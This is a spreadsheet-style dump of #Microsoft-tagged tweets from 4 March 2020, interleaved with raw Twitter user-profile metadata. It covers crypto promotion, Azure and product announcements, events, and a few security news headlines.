    <t>{'id': 1178355613237202956, 'id_str': '1178355613237202956', 'name': 'Samuel LM', 'screen_name': 'wizard2777', 'location': '', 'description': '', 'url': 'https://t.co/Nw9RJoIlBK', 'entities': {'url': {'urls': [{'url': 'https://t.co/Nw9RJoIlBK', 'expanded_url': 'http://wizard.uno/', 'display_url': 'wizard.uno', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3, 'friends_count': 49, 'listed_count': 0, 'created_at': 'Sun Sep 29 17:08:38 +0000 2019', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 40, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1228127245019074560/j4K4xWVy_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1228127245019074560/j4K4xWVy_normal.jpg',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</si>
  <si>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23:36:30 +0000 2020</t>
  </si>
  <si>
    <t>That's some cool stuff going on!
#Crypto #cryptocurrencies #blockchain #cryptotwitter #blockchain #DeFi #EY #Microsoft #Finance
https://t.co/A2HgiOe54W</t>
  </si>
  <si>
    <t>{'id': 987495120760066048, 'id_str': '987495120760066048', 'name': 'HappyTheCryptoCat', 'screen_name': 'CryptoHappyCat', 'location': '', 'description': 'A happy cat from the future. #Hodler  \n#Crypto stuff excites me. \nBlockchain | IoT | DeFi | AR/VR | A.I\nCheck out https://t.co/e2d793qbLw &amp; https://t.co/vK2jCQv1nv', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/e2d793qbLw', 'expanded_url': 'http://thinkaboutinnovation.com', 'display_url': 'thinkaboutinnovation.com', 'indices': [114, 137]}, {'url': 'https://t.co/vK2jCQv1nv', 'expanded_url': 'http://ausfoodiesclub.com', 'display_url': 'ausfoodiesclub.com', 'indices': [140, 163]}]}}, 'protected': False, 'followers_count': 254, 'friends_count': 673, 'listed_count': 13, 'created_at': 'Sat Apr 21 00:55:58 +0000 2018', 'favourites_count': 2227, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 782, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1082950232260829185/WLh38L0B_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1082950232260829185/WLh38L0B_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/987495120760066048/1524275412',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</si>
  <si>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23:30:55 +0000 2020</t>
  </si>
  <si>
    <t>Get ready to take down enemies with a vast array of weaponry and see cool graphics in Call of Duty Modern Warfare 3 https://t.co/TNzwpdFp2B #microsoft #xbox #xbox360 #gaming #fps https://t.co/AULbQoN45A</t>
  </si>
  <si>
    <t>Wed Mar 04 23:30:11 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft @Xbox One S with accessories. Bid here, #thrifty: 
https://t.co/M6nkN7GfBX
@EMGraphicsOnWeb #goodwillpdx @jojokejohn #ReuseElectronics  @RedworldToys @Randomitable @TheXboxMom @bjaycee https://t.co/58gxLvJU60</t>
  </si>
  <si>
    <t>{'id': 695286850047578112, 'id_str': '695286850047578112', 'name': 'Goodwill Industries of the Columbia Willamette', 'screen_name': 'meetgoodwill', 'location': 'Portland, OR', 'description': 'Providing news from Goodwill Industries of the Columbia Willamette', 'url': 'https://t.co/Y3QaeEej2F', 'entities': {'url': {'urls': [{'url': 'https://t.co/Y3QaeEej2F', 'expanded_url': 'http://meetgoodwill.org', 'display_url': 'meetgoodwill.org', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2239, 'friends_count': 4766, 'listed_count': 53, 'created_at': 'Thu Feb 04 16:44:37 +0000 2016', 'favourites_count': 11299, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6804,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'http://pbs.twimg.com/profile_images/1173716451884011522/Lp3pATJE_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1173716451884011522/Lp3pATJE_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/695286850047578112/1568136177',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</si>
  <si>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23:19:35 +0000 2020</t>
  </si>
  <si>
    <t>Looking forward to being part of the Accelerating Inclusion Panel for International Women's Day Event sponsored by Accenture on Friday, March 6th at the Microsoft Technology Center. #EqualityForAll #Microsoft #Accenture https://t.co/QUb1kDoXS2</t>
  </si>
  <si>
    <t>{'id': 899815165314691073, 'id_str': '899815165314691073', 'name': 'Jenny', 'screen_name': 'Jenny_Bartlow', 'location': 'Chesterfield, MO', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 37, 'friends_count': 75, 'listed_count': 0, 'created_at': 'Tue Aug 22 02:07:07 +0000 2017', 'favourites_count': 135, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 206, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/948360491679866880/-jYSWaHU_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/948360491679866880/-jYSWaHU_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/899815165314691073/1514942293',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</si>
  <si>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23:15:17 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft is proud to sponsor Midwest Gateway Chapter of HIMSS Innovation 2020 Healthcare Informatics: Coming into Focus on April 16th!!! Don't miss it! Registration: https://t.co/LZF1m562rY #Data #AI #Microsoft #HIMSS https://t.co/4SGuDYcIES</t>
  </si>
  <si>
    <t>Wed Mar 04 23:14:56 +0000 2020</t>
  </si>
  <si>
    <t>We're working with a Midwest-based #Microsoft ERP focused firm looking to acquire other midwest businesses delivering Great Plains services. if you're considering the sale of your #MSDynamics business, let's talk: info@revenuerocket.com https://t.co/UBnrHLJESk</t>
  </si>
  <si>
    <t>{'id': 728854046, 'id_str': '728854046', 'name': 'Revenue Rocket', 'screen_name': 'RevenueRocket', 'location': 'Minneapolis, MN, USA', 'description': "We're a management consulting firm dedicated to the profitable growth of IT services firms worldwide. EST. 2001", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 731, 'friends_count': 1916, 'listed_count': 11, 'created_at': 'Tue Jul 31 17:33:17 +0000 2012', 'favourites_count': 8, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 459,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'http://pbs.twimg.com/profile_images/2560622321/uok79r8dryiwususzr2p_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2560622321/uok79r8dryiwususzr2p_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/728854046/1476397633', 'profile_link_color': '9D0B0E',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</si>
  <si>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23:14:25 +0000 2020</t>
  </si>
  <si>
    <t>cryptodailyuk: How YOU Can Develop $ETH With #Microsoft
Read more: https://t.co/cYgicWJDRO</t>
  </si>
  <si>
    <t>{'id': 48955876, 'id_str': '48955876', 'name': 'Andy Denton', 'screen_name': 'andybdenton', 'location': 'Worldwide', 'description': 'Part Time Chandelier Cleaner | Part Time #crypto Investor | #blockchain  #electroneum #weareyourblock | All views are my own and not for advice!', 'url': 'https://t.co/r3GC8hsEHs', 'entities': {'url': {'urls': [{'url': 'https://t.co/r3GC8hsEHs', 'expanded_url': 'https://medium.com/@andydenton', 'display_url': 'medium.com/@andydenton', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 749, 'friends_count': 407, 'listed_count': 13, 'created_at': 'Sat Jun 20 07:47:52 +0000 2009', 'favourites_count': 324, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 22044,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'http://pbs.twimg.com/profile_images/661515728466681856/lUpSlul9_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/661515728466681856/lUpSlul9_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/48955876/1531204219',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</si>
  <si>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23:07:56 +0000 2020</t>
  </si>
  <si>
    <t>Announcing preview of Backup Reports https://t.co/EJHL9KQD88 #microsoft #feedly</t>
  </si>
  <si>
    <t>Wed Mar 04 23:07:33 +0000 2020</t>
  </si>
  <si>
    <t>Update to the Microsoft Authenticator app now rolling out https://t.co/0j0LuouKix #microsoft #feedly</t>
  </si>
  <si>
    <t>Wed Mar 04 23:07:09 +0000 2020</t>
  </si>
  <si>
    <t>Management operations and data access for Azure SQL Database with Golang https://t.co/I6qMCXLTJ6 #microsoft #feedly</t>
  </si>
  <si>
    <t>Wed Mar 04 23:05:08 +0000 2020</t>
  </si>
  <si>
    <t>How YOU Can Develop $ETH With #Microsoft
Read more: https://t.co/OBbvpgX07S</t>
  </si>
  <si>
    <t>{'id': 910120075637686272, 'id_str': '910120075637686272', 'name': 'Crypto Dailyâ„¢ ðŸ‘‰ Official Channel', 'screen_name': 'cryptodailyuk', 'location': 'Singapore', 'description': "Crypto Daily, one of the world's only free-to-publish crypto news sites and media networks. Let us guide you through the ever-changing world of cryptocurrency", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 8309, 'friends_count': 690, 'listed_count': 100, 'created_at': 'Tue Sep 19 12:35:10 +0000 2017', 'favourites_count': 164, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 10160,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'http://pbs.twimg.com/profile_images/1212169595399868416/-baD1Iy9_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1212169595399868416/-baD1Iy9_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/910120075637686272/1577838728', 'profile_link_color': '19CF88',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</si>
  <si>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23:05:04 +0000 2020</t>
  </si>
  <si>
    <t>Monitor your apps as efficiently as possible, even if they're supported by resources outside of #Azure. BindPlane streamlines metric collection for @Azure users monitoring #multicloud, #multidatabase, or #hybridplatform environments. Read more: https://t.co/3lrjslvwoU #microsoft https://t.co/vuHDn97jUQ</t>
  </si>
  <si>
    <t>{'id': 64884706, 'id_str': '64884706', 'name': 'Blue Medora', 'screen_name': 'bluemedora', 'location': 'Michigan, USA', 'description': 'Blue Medora helps customers unlock dimensional data across their IT stack, otherwise hidden by traditional approaches to metrics collection.', 'url': 'http://t.co/F19L0ZgwEv', 'entities': {'url': {'urls': [{'url': 'http://t.co/F19L0ZgwEv', 'expanded_url': 'http://bluemedora.com', 'display_url': 'bluemedora.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2558, 'friends_count': 2434, 'listed_count': 104, 'created_at': 'Wed Aug 12 00:56:18 +0000 2009', 'favourites_count': 2367, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6539,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'http://pbs.twimg.com/profile_images/965877996145070081/wclzMLny_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/965877996145070081/wclzMLny_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/64884706/1519117654', 'profile_link_color': '189BD6',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</si>
  <si>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23:03:57 +0000 2020</t>
  </si>
  <si>
    <t>I miss tonight. Do you like?  
https://t.co/e1hgr04DzR
 #melbourne #microsoft https://t.co/R0RKsGtzb0</t>
  </si>
  <si>
    <t>{'id': 1235336429158440960, 'id_str': '1235336429158440960', 'name': 'Laura Hilbrands', 'screen_name': 'clubavhasul', 'location': 'Peoria, USA', 'description': 'Heâ€™s more myself than I am. Whatever our souls are made of, his and mine are the same', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 8, 'friends_count': 33, 'listed_count': 0, 'created_at': 'Wed Mar 04 22:48:56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'http://pbs.twimg.com/profile_images/1235338051880132609/Z26jn41K_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235338051880132609/Z26jn41K_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235336429158440960/1583369907',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</si>
  <si>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23:03:31 +0000 2020</t>
  </si>
  <si>
    <t>More #crypto adoption! 
#consensys #EY #ethereum #microsoft #cooldex #bitcoin #btc #eth 
https://t.co/zrUiIbdY6S</t>
  </si>
  <si>
    <t>{'id': 944972157032988672, 'id_str': '944972157032988672', 'name': 'BT', 'screen_name': 'cryptobenjamino', 'location': 'Global', 'description': 'Online Entrepreneur, Investor and Blockchain - Crypto Advisor - Cyber Security', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 3679, 'friends_count': 422, 'listed_count': 26, 'created_at': 'Sun Dec 24 16:44:53 +0000 2017', 'favourites_count': 5673, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5585, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1200558574998609933/ntH-elUl_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1200558574998609933/ntH-elUl_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/944972157032988672/1569767257',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</si>
  <si>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23:00:40 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "Ryuk Ransomware Attacked Epiq Global Via TrickBot Infection:" https://t.co/faerRbvSm6
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Wed Mar 04 23:00:02 +0000 2020</t>
  </si>
  <si>
    <t>#ITechskills #Academy provides #Microsoft #excel #training, #excel #intermediate #crash #course in #Mississauga, Ontario.
we offer excel #advanced #course #classes from excel #basic #training to #advance #level.
Please write your answer in comment box !!
Follow Us and ENJOY! https://t.co/9TE2QV5FUs</t>
  </si>
  <si>
    <t>Wed Mar 04 23:00:00 +0000 2020</t>
  </si>
  <si>
    <t>We're rearchitecting everything at Microsoft now that we're fully in the #cloud.  #transformation #Azure #Microsoft https://t.co/v2v9buUzVs</t>
  </si>
  <si>
    <t>Wed Mar 04 22:58:28 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #OneNote Used To Sidestep #Phishing Detection: https://t.co/HAzlLTwmHf via @threatpost #informedsecurity https://t.co/qxq1f7I0zT</t>
  </si>
  <si>
    <t>Wed Mar 04 22:57:34 +0000 2020</t>
  </si>
  <si>
    <t>Read our Senior Systems Engineer's article on how to overcome the problem with complex filters in SharePoint views: https://t.co/EouyADYTbO
#sharepointonline #sharepointdeveloper #filters #sharepoint #views #microsoft https://t.co/J7nuAJJjc9</t>
  </si>
  <si>
    <t>{'id': 80731672, 'id_str': '80731672', 'name': 'Wave TSG', 'screen_name': 'WAVE_TSG', 'location': '', 'description': '', 'url': 'https://t.co/l2MTZ2coRW', 'entities': {'url': {'urls': [{'url': 'https://t.co/l2MTZ2coRW', 'expanded_url': 'http://www.wave-tsg.com', 'display_url': 'wave-tsg.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 154, 'friends_count': 5, 'listed_count': 1, 'created_at': 'Thu Oct 08 01:25:16 +0000 2009', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1217910171441041408/54UWNZDO_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1217910171441041408/54UWNZDO_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/80731672/1579207222', 'profile_link_color': '0084B4', 'profile_sidebar_border_color': '036CA1', 'profile_sidebar_fill_color': 'DDEEF6', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 22:51:47 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft, #Google Offer Free Remote Work Tools Due to Coronavirus
https://t.co/qSFodaSvhY https://t.co/iRZvqPLPPi</t>
  </si>
  <si>
    <t>Wed Mar 04 22:49:13 +0000 2020</t>
  </si>
  <si>
    <t>As a 100% tablet mode user of Surface Pro, projected to a second screen at my desk. I love Live Tiles. #LiveTiles #SurfacePro #Microsoft</t>
  </si>
  <si>
    <t>{'id': 1423199233, 'id_str': '1423199233', 'name': 'AllNewsTechie', 'screen_name': 'AllNewsTechie', 'location': '', 'description': '', 'url': 'http://t.co/r9brxNMCTG', 'entities': {'url': {'urls': [{'url': 'http://t.co/r9brxNMCTG', 'expanded_url': 'http://allnewstechie.com', 'display_url': 'allnewstechie.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 11, 'friends_count': 4, 'listed_count': 2, 'created_at': 'Sun May 12 13:46:35 +0000 2013', 'favourites_count': 7, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2997,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'http://pbs.twimg.com/profile_images/433642766313086977/HYm-Zuz0_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/433642766313086977/HYm-Zuz0_normal.png',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</si>
  <si>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22:48:02 +0000 2020</t>
  </si>
  <si>
    <t>#Honeywell says it built the world's most powerful #quantumcomputer https://t.co/QraYLNCKiy quant3um #quantumsupremacy #qubits #ibm #google #sycamore #microsoft https://t.co/4OuXmHgecl</t>
  </si>
  <si>
    <t>{'id': 203025512, 'id_str': '203025512', 'name': 'Harold Gardner', 'screen_name': 'haroldlgardner', 'location': 'Houston, TX', 'description': 'Just a simple country boy doing the best I can in the big city! I #followback', 'url': 'http://t.co/7mYxriO5VM', 'entities': {'url': {'urls': [{'url': 'http://t.co/7mYxriO5VM', 'expanded_url': 'http://haroldgardner.blogspot.com', 'display_url': 'haroldgardner.blogspot.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 25301, 'friends_count': 19502, 'listed_count': 879, 'created_at': 'Fri Oct 15 10:59:16 +0000 2010', 'favourites_count': 7904, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 84226,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'http://pbs.twimg.com/profile_images/1145713830/Harold_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1145713830/Harold_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/203025512/1472820654',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</si>
  <si>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22:44:02 +0000 2020</t>
  </si>
  <si>
    <t>Contest Winners: Secure Everything with #AzureSphere by Hackster, Microsoft, and AVNet
 #Contest #Hackster #iot #Microsoft #Azure
https://t.co/xVVEUI6aZf</t>
  </si>
  <si>
    <t>Wed Mar 04 22:43:56 +0000 2020</t>
  </si>
  <si>
    <t>Ex-Microsoft Employee Convicted Of 18 Felonies In $10 Million Cryptocurrency Embezzlement Scheme - February 2020
https://t.co/ALhllurKGF
#insider #threat #insiderthreat #employee #former #employer #program #cryptocurrency #microsoft #convicted #embezzlement #embezzling #embezzle</t>
  </si>
  <si>
    <t>{'id': 1141030462586011648, 'id_str': '1141030462586011648', 'name': 'Insider Threat Defense Group', 'screen_name': 'InsiderThreatDG', 'location': 'West Palm Beach, FL', 'description': 'Insider Threat Mitigation Training &amp; Services To Over 2300+ Organizations Worldwide', 'url': 'https://t.co/3I85BKhkcd', 'entities': {'url': {'urls': [{'url': 'https://t.co/3I85BKhkcd', 'expanded_url': 'http://www.insiderthreatdefense.us', 'display_url': 'insiderthreatdefense.us', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 35, 'friends_count': 12, 'listed_count': 2, 'created_at': 'Tue Jun 18 17:10:36 +0000 2019', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 608, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1141057415175168002/0HEDJ5aR_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1141057415175168002/0HEDJ5aR_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1141030462586011648/1560884272',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</si>
  <si>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22:40:12 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Customer Support Exposed 250 Million User Records #Dataleak #Microsoft #Breaches #CyberSecurity #Flaw https://t.co/HDjA7Z4AvZ</t>
  </si>
  <si>
    <t>Wed Mar 04 22:34:11 +0000 2020</t>
  </si>
  <si>
    <t>Workspot #cloud desktops can be up &amp;amp; running on #Microsoft #Azure fast. For virtual desktops, we offer unmatched time-to-value, outstanding performance, &amp;amp; the industry's leading desktop uptime at 99.95%. Learn more about how #Workspot is different. https://t.co/FaJ2KylTou https://t.co/GOKBZeAbAs</t>
  </si>
  <si>
    <t>{'id': 1329688471, 'id_str': '1329688471', 'name': 'Workspot', 'screen_name': 'Workspot', 'location': 'Cupertino, CA', 'description': 'Workspot is an insanely simple, turnkey cloud service for securely delivering virtual desktops, apps and workstations from Azure to any device. Deploy in a day!', 'url': 'http://t.co/8C5OwHRnRE', 'entities': {'url': {'urls': [{'url': 'http://t.co/8C5OwHRnRE', 'expanded_url': 'http://www.workspot.com', 'display_url': 'workspot.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1872, 'friends_count': 912, 'listed_count': 92, 'created_at': 'Fri Apr 05 17:17:48 +0000 2013', 'favourites_count': 1084, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5547,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'http://pbs.twimg.com/profile_images/878408793310154753/pKtWhFmv_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/878408793310154753/pKtWhFmv_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1329688471/1489213100', 'profile_link_color': '00A1BD',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</si>
  <si>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22:33:22 +0000 2020</t>
  </si>
  <si>
    <t>John Hoegger explains how his team at Microsoft came to be 50% women.
https://t.co/xfhZDcvClf
@Microsoft @SoniaTagare @theCUBE #WiDS2020 #theCUBE #Microsoft #EnterpriseTech #WomeninTech #datascience https://t.co/5F7mPGCwgk</t>
  </si>
  <si>
    <t>Wed Mar 04 22:32:07 +0000 2020</t>
  </si>
  <si>
    <t>Investors move from coronavirus woes to Biden wins as markets rally on Super Tuesday results https://t.co/uGhvPGtwCv #Microsoft</t>
  </si>
  <si>
    <t>Wed Mar 04 22:30:31 +0000 2020</t>
  </si>
  <si>
    <t>Have you heard of Federated Wireless? They could be shaking up the industry with their turneky 4G/5G service that leverages AWS and Microsoft Azure 
 Read more: https://t.co/MQkJggWvPy
#federatedwireless #aws #microsoft #azure #5g</t>
  </si>
  <si>
    <t>{'id': 1033189477139787776, 'id_str': '1033189477139787776', 'name': 'Quaversal', 'screen_name': 'quaversal', 'location': 'Charlotte, NC', 'description': 'We help businesses adopt enterprise-grade technologies that work for them. #Cisco and HP Enterprise authorized #Networking #collaboration #automation #HPE', 'url': 'https://t.co/jRGb10dRR5', 'entities': {'url': {'urls': [{'url': 'https://t.co/jRGb10dRR5', 'expanded_url': 'https://www.quaversal.com', 'display_url': 'quaversal.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 78, 'friends_count': 383, 'listed_count': 0, 'created_at': 'Sat Aug 25 03:09:01 +0000 2018', 'favourites_count': 77, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 212, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1052257283877601292/oFeSgVd8_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1052257283877601292/oFeSgVd8_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1033189477139787776/1576068753',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</si>
  <si>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22:30:07 +0000 2020</t>
  </si>
  <si>
    <t>Latest OneNote beta comes with dark mode toggle (APK download) (Updated)
https://t.co/AMOAESzP9D
#news #tech #computer #game #live #applications #downloads #microsoft #news #apkdownload #darkmode #download #microsoft #nightmode #onenote #windows
https://t.co/AMOAESzP9D</t>
  </si>
  <si>
    <t>{'id': 375406821, 'id_str': '375406821', 'name': 'Club Ednita Rep. Dom', 'screen_name': 'ClubEdnita_RD', 'location': 'RepÃºblica Dominicana', 'description': 'Club Amigos de Ednita Sede Oficial Rep.Dom. Para Ingresar al Club Amigos de Ednita escrÃ­benos a: clubednitard@hotmail.com', 'url': 'http://t.co/utz53zh4Zr', 'entities': {'url': {'urls': [{'url': 'http://t.co/utz53zh4Zr', 'expanded_url': 'http://www.clubamigosdeednita.com', 'display_url': 'clubamigosdeednita.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 333, 'friends_count': 93, 'listed_count': 3, 'created_at': 'Sun Sep 18 02:38:19 +0000 2011', 'favourites_count': 23, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2402, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '5C56D1', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/378800000196972543/97c1114acd3447605f0a0f92c17edd11_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000196972543/97c1114acd3447605f0a0f92c17edd11_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/375406821/1380382119',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</si>
  <si>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22:29:01 +0000 2020</t>
  </si>
  <si>
    <t>Microsofts Ann Johnson: Security Needs AI With Human Spirit - SDxCentral https://t.co/nJsRyzOJGJ
#infosec #cybersecurity #informationsecurity #computersecurity #microsoft</t>
  </si>
  <si>
    <t>{'id': 4285781598, 'id_str': '4285781598', 'name': 'Dean Norris', 'screen_name': 'threat_news', 'location': 'San Francisco, CA', 'description': 'Current Information Security Issues that are in the News', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 39, 'friends_count': 96, 'listed_count': 2, 'created_at': 'Thu Nov 19 04:01:14 +0000 2015', 'favourites_count': 689, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 601,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'http://pbs.twimg.com/profile_images/1008485929487511553/5uNh73BV_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1008485929487511553/5uNh73BV_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4285781598/1575886655',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</si>
  <si>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22:22:28 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Releases #PowerShell 7.0 With New Features, Update Alerts https://t.co/QnRJkJe46Y</t>
  </si>
  <si>
    <t>{'id': 43554116, 'id_str': '43554116', 'name': 'Frank Garufi Jr.', 'screen_name': 'fgarufijr', 'location': 'Northfield, NJ', 'description': 'Director of Technology at @StAugustinePrep - #Technology Enthusiast - #IBD ( #Crohns &amp; #UlcerativeColitis ) Advocate. Follow @CrohnsEffect for IBD Tweets', 'url': 'https://t.co/6cmiPA0eVD', 'entities': {'url': {'urls': [{'url': 'https://t.co/6cmiPA0eVD', 'expanded_url': 'http://www.cceeffect.org', 'display_url': 'cceeffect.org', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 354, 'friends_count': 448, 'listed_count': 18, 'created_at': 'Sat May 30 16:44:01 +0000 2009', 'favourites_count': 7410, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1147,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'http://pbs.twimg.com/profile_images/789525740433903621/Qzzeg0W3_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/789525740433903621/Qzzeg0W3_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/43554116/1548029157',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</si>
  <si>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Wed Mar 04 22:20:58 +0000 2020</t>
  </si>
  <si>
    <t>Amazon employee tests positive for coronavirus  one in Seattle and two in Milan, Italy.
https://t.co/ciqNHSM0kR
#coronavirus #amazon #seattle #milan #italy #microsoft #tech #news #insidetechworld #technology</t>
  </si>
  <si>
